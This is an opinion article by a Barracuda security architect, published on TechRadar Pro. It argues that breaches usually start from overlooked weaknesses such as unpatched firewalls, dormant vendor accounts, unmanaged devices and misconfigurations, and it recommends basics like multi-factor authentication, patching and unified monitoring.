Closing the security blind spots that are a prime entry point for attacks

Opinion
By published

Unpatched firewalls continue to give threat actors their golden opportunity

Malware attack virus alert , malicious software infection , cyber security awareness training to protect business
(Image credit: Shutterstock)

What if the biggest cybersecurity risk is not the attack you fear most, but the weakness you forgot or never knew was there?

Many organizations worry that the next breach will come from a highly sophisticated attack so advanced that nothing could have stopped it. That fear is understandable, but the truth is often more uncomfortable.

Yaz Bekkar

Principal Consulting Architect XDR - International, Office of the CTO, Barracuda.

In many cases, breaches do not begin with an unstoppable threat. They begin with a blind spot such as a missed patch, a dormant account, a device outside corporate security control or a firewall left exposed. These small gaps that are easy to overlook are exactly the kind of gaps attackers know how to find.

Latest Videos From

This is the reality, and one of the key findings from our recent report, which found that, in most cases, it is preventable security issues that open the door. Unpatched firewalls, rogue endpoints, dormant identities and misconfigurations continue to give threat actors the opportunity they need.

Why are attackers focusing more on identity than infrastructure?

Because compromising an identity is often easier and quieter than attacking a system head-on.

Once attackers compromise an identity, they are no longer forcing their way in. They are walking in through a trusted door and this is an important shift that we’re now seeing.

Stolen usernames and passwords can provide access to cloud services, email and remote access tools, and valid credentials let attackers easily blend in with normal user activity.

From there, they can escalate privileges, move laterally and turn limited access into broader control over the environment.

Sometimes, the speed with which this happens is startling. In one case, we have detected that the time between the initial breach and the execution of a full ransomware attack was just three hours.

In another real-world incident, attackers gained access through a dormant account that had originally been created for a third-party vendor and was never deactivated after the contract ended. One forgotten account eventually became the route to ransomware.

Are organizations still being exposed by endpoint and firewall gaps?

Yes, and at scale. Attackers actively look for unprotected business laptops, tablets or servers that fall outside normal security controls, because these devices can provide a path around corporate defenses.

The issue is not always a lack of security tools. In our experience, from monitoring thousands of different environments, the issue often comes down to a lack of consistent configuration. Security tools that have either been accidentally or intentionally disabled present a major security risk. The danger can be heightened as teams may have a false sense of security that comes from having the tool installed in the first place.

We also know that many organizations are trying to manage too many security tools with limited resources. And when teams are overstretched, configuration errors become more likely. That is often where attackers gain their advantage.

It also helps explain why relatively simple attack techniques remain so effective.

Threat actors continue to exploit known vulnerabilities, including some that have been around for years which can be found in legacy systems such as old servers or applications.

More striking still, from our analysis of data last year , we found that the vast majority of ransomware incidents exploited firewalls through either a CVE or a vulnerable account.

Why are modern attacks becoming harder to spot?

Some of the most malicious behavior can look annoyingly legitimate.

Threat actors are increasingly relying on living-off-the-land (LOTL) techniques, using legitimate tools already present in the environment to carry out malicious actions.

One of the clearest examples is fileless malware attacks which use PowerShell as the primary execution method.

That creates a serious challenge for defenders. PowerShell is widely used for legitimate IT administration and maintenance. When malicious activity mimics normal operations, it becomes much harder to distinguish threat behavior from business-as-usual.

This is one of the most difficult blind spots organizations face today: not the threat you can clearly see, but the one that resembles something familiar.

How could agentic AI make this worse?

AI is helping threat actors move faster, adapt quicker and scale their efforts far more efficiently.

As threat actors adopt agentic AI, the exploitation of common weaknesses is likely to accelerate. These technologies can help cybercriminals scan environments continuously, identify weak configurations in minutes and rewrite malicious code on the fly to avoid detection.

In other words, the same overlooked issues that are already dangerous today could become even more exposed tomorrow.

That is why basic security weaknesses can no longer be treated as minor issues. In an environment where attacks can be launched and adapted far more quickly, weak identity management controls, unpatched systems and unmanaged devices become far more costly.

So what should organizations do now?

Start with the basics and treat them as strategically important, not operational housekeeping.

Some of the fastest and most effective improvements include: consistent multi-factor authentication and stronger access controls; a disciplined approach to patch management and data protection and regular cybersecurity awareness training for employees

But closing blind spots fully requires more than isolated fixes because resilience depends on visibility. The more fragmented security becomes, the easier it is for critical signals to be missed. But when organizations have end-to-end visibility and coordinated management across their environment, they are far better placed to detect both the obvious weaknesses and the hidden ones.

A unified security strategy is one that combines advanced, AI-powered detection technologies with a fully automated SOC. Working with a provider who can deliver that protection 24/7 through a comprehensive managed security platform reduces the burden on internal teams.

And that is what long-term cyber resilience is really built on: not just defending against the spectacular attack, but closing the everyday gaps that attackers are counting on.

As I always say; the breach that changes everything often begins with something that seemed too small to matter.

We feature the best small and medium business (SMB) firewall software.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

TOPICS
Yaz Bekkar

Principal Consulting Architect XDR - International, Office of the CTO, Barracuda.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.